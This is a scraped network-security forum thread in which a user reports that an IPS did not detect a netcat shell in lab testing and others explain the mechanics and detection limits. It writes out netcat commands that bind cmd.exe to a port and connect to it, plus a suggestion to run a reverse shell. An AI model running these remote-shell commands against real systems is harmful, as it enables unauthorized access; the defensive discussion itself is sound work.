https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854134#M85724 <HTML><HEAD></HEAD><BODY><P>Got it! But, as a matter of fact my doubt was: </P><P>Can IDS sensors detect netcat activity on the network? Does the netcat operates in a RFC TCP standards and therefore it is seen as normal traffic?</P><P></P><P></P></BODY></HTML> Fri, 14 Sep 2007 16:59:48 GMT jopontes 2007-09-14T16:59:48Z https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854131#M85720 <P>I am doing the following lab testing: </P><P></P><P>nc ?v ?l ?e cmd.exe ?p 565</P><P></P><P>Attacker: </P><P>nc ?v .x.x.x.x 565</P><P></P><P>I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack? </P><P></P><P>Any help is highly appreciated. </P><P></P><P></P> Sun, 10 Mar 2019 10:47:47 GMT https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854131#M85720 jopontes 2019-03-10T10:47:47Z https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854132#M85722 <HTML><HEAD></HEAD><BODY><P>***</P><P></P><P>nc -v -l -e cmd.exe -p 565</P><P></P><P>Attacker:</P><P>nc -v .x.x.x.x 565 </P></BODY></HTML> Thu, 13 Sep 2007 19:23:39 GMT https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854132#M85722 jopontes 2007-09-13T19:23:39Z https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854133#M85723 <HTML><HEAD></HEAD><BODY><P>You are using netcat to setup a listener on port 565 and asking it to execute cmd.exe when a client connects. It doesn't actually send "cmd.exe" to the client, it redirects STDIN and STDOUT to the client.</P><P></P><P>To trigger your signature, setup the listener without a "-e" command. Have the client use "-e cmd.exe" when connecting.</P></BODY></HTML> Fri, 14 Sep 2007 16:29:49 GMT https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854133#M85723 mhellman 2007-09-14T16:29:49Z https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854134#M85724 <HTML><HEAD></HEAD><BODY><P>Got it! But, as a matter of fact my doubt was: </P><P>Can IDS sensors detect netcat activity on the network? Does the netcat operates in a RFC TCP standards and therefore it is seen as normal traffic?</P><P></P><P></P></BODY></HTML> Fri, 14 Sep 2007 16:59:48 GMT https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854134#M85724 jopontes 2007-09-14T16:59:48Z https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854135#M85725 <HTML><HEAD></HEAD><BODY><P>Not reliably AFAIK. It's not like telnet or ftp that tend to use specific ports or have application RFC's. With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection). I haven't played with that much yet myself.</P></BODY></HTML> Fri, 14 Sep 2007 17:05:32 GMT https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854135#M85725 mhellman 2007-09-14T17:05:32Z https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854136#M85726 <HTML><HEAD></HEAD><BODY><P>Thanks Matt! I'll try to update the sensor and play with that then. </P></BODY></HTML> Fri, 14 Sep 2007 17:31:16 GMT https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854136#M85726 jopontes 2007-09-14T17:31:16Z